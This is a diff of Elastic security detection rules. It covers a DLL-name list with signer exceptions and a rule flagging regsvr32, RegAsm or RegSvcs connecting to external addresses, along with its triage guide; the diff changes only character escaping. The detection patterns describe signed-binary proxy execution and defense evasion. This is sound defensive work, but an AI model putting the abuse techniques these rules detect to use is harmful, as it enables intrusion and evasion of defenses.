\"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", \"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", \"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", \"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", \"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", \"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", \"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", \"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", \"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", \"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", \"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", \"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", \"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", \"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Bitdefender SRL\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"kerberos.dll\" and dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n", "related_integrations": [ { "package": "endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json index 30d54cd7764..4d39f89357f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json index b2c31960759..f89877a5d60 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json index 76981462f8d..c45f167b71e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers 